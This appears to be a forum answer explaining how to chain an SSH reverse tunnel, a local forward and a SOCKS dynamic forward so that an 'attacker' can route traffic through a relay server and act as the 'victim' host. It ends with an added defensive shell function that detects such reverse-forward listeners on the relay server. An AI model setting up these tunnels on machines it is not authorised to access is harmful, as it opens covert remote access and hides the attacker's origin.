Apparently nobody can answer this question; that's okay because I found the answer myself.
- On victim: `ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>`
- On attacker #1: `ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>`
- On attacker #2: `ssh -p 4444 -D localhost:3333 user_on_victim@localhost`
- On attacker #3: in Firefox or irc, or even for the general network settings: SOCKS (v5) proxy settings: 127.0.0.1 port 3333
Every application you set up for host localhost with port 3333 will be tunneled via serv to the victim, and when you visit something like http://myip.com you'll see the IP/host of the victim. From here on you can even use GUI applications on attacker (if you set up SOCKS settings for the specific app or for the system as a whole), which will be tunneled via serv to victim, and you'll act as victim as such.
The mistake I made in my thought process was that I didn't really understand what the reversed port scheme looks like; I will try to explain it in simple terms.
Victim action
`ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>`
- -N = I'm not going to run commands in the shell
- -f = put the process in the background (so you can close the terminal window)
- -R = reversed tunnel
- 5555:localhost:22 = 5555 is the port on which serv internally is listening to put data forward to port 22 on victim. If you've set up victim to have ssh run on port 2222 you should change 22 to 2222.
- -p = port on which ssh on serv is running.
1st attack action
`ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>`
The 1st command you make on attacker (`-L 4444:localhost:5555`) will set up a tunnel so that your connection with your 3rd command will be tunneled right through to victim. (This is just for dynamic port forwarding / SOCKS applications.)
If you just want to have shell access on victim, instead of this command you just ssh in to serv & then run the command: `ssh user_on_victim@localhost -p 5555`. But we don't want shell access, we want to tunnel all data dynamically, so we have to make a port-forward.
Or the schematic explanation:
- -L = local port forwarding (on serv)
- 4444:localhost:5555 = put all data coming in on port 4444 to port 5555.
2nd attack action
The 2nd command you make on attacker
`ssh -p 4444 -D localhost:3333 user_on_victim@localhost`
is the actual command that's going to initialise the connection through the 2 tunnels. What you do is you say: connect to port 4444 and put all the data that's coming in on (localhost port 3333) to 4444 (which will be put through locally on serv to port 5555 -> which will be pushed out to port 22 on victim).
Or the schematic explanation:
- -D = dynamic forwarding
- localhost:3333 = listen on port 3333 and push data through the ssh connection to port 4444 to serv.
- -p 4444 = the port on which serv is listening to put the data forward to port 5555 and then out to port 22 on victim.
3rd attack action
The 3rd action on attacker is the actual data you're going to tunnel to victim. It does not matter what data or application this is; that's why it's dynamic forwarding. It does not matter on which ports these applications run because that will be handled by SOCKS.
Set up your applications or even your entire system to use a SOCKS (v5) proxy server on address localhost, port 3333. It does not matter on which ports these applications run normally because that will be handled by the proxy server. In theory every application can run via SOCKS proxy dynamic port forwarding. You'll only have to set it up. :)
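Seen from the side of whoever administers serv: the victim's `-R 5555:localhost:22` makes sshd on serv itself hold a LISTEN socket on 127.0.0.1:5555, and that is visible in `ss -tlnp`. The shell function below (added here, not part of the original answer) filters such sshd-owned listeners out of a constructed sample of that output; it assumes sshd's own port is 22 unless another port is passed in.

```shell
#!/bin/sh
# Constructed sample of `ss -tlnp` output as it would look on "serv" after the
# victim's `ssh -R 5555:localhost:22` has connected (not captured from a real host).
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      128    127.0.0.1:5555      0.0.0.0:*         users:(("sshd",pid=2391,fd=9))
LISTEN 0      511    127.0.0.1:80        0.0.0.0:*         users:(("nginx",pid=600,fd=6))
LISTEN 0      128    [::]:22             [::]:*            users:(("sshd",pid=812,fd=4))'

# Reads `ss -tlnp` output on stdin and prints the local address:port of every
# LISTEN socket owned by sshd on a port other than the daemon's own.  sshd only
# opens such listeners when a client asked for a remote forward (-R), so each
# printed line is a reverse-tunnel endpoint worth correlating with the auth log.
# $1 = the daemon's configured port (defaults to 22; pass <port_of_serv> if changed).
find_reverse_forwards() {
    daemon_port="${1:-22}"
    awk -v dport="$daemon_port" '
        $1 == "LISTEN" && $0 ~ /users:\(\("sshd"/ {
            n = split($4, parts, ":")      # port is the last ":"-separated field
            if (parts[n] != dport) print $4
        }'
}

# Stand-alone use on a real host:  ss -tlnp | find_reverse_forwards 22
printf '%s\n' "$SAMPLE_SS" | find_reverse_forwards 22     # prints 127.0.0.1:5555
```

Sockets bound by the ssh client on attacker (4444 and 3333) never show up on serv; the only footprint the jump host sees is the sshd-held listener, which is why this check looks at process ownership rather than port numbers.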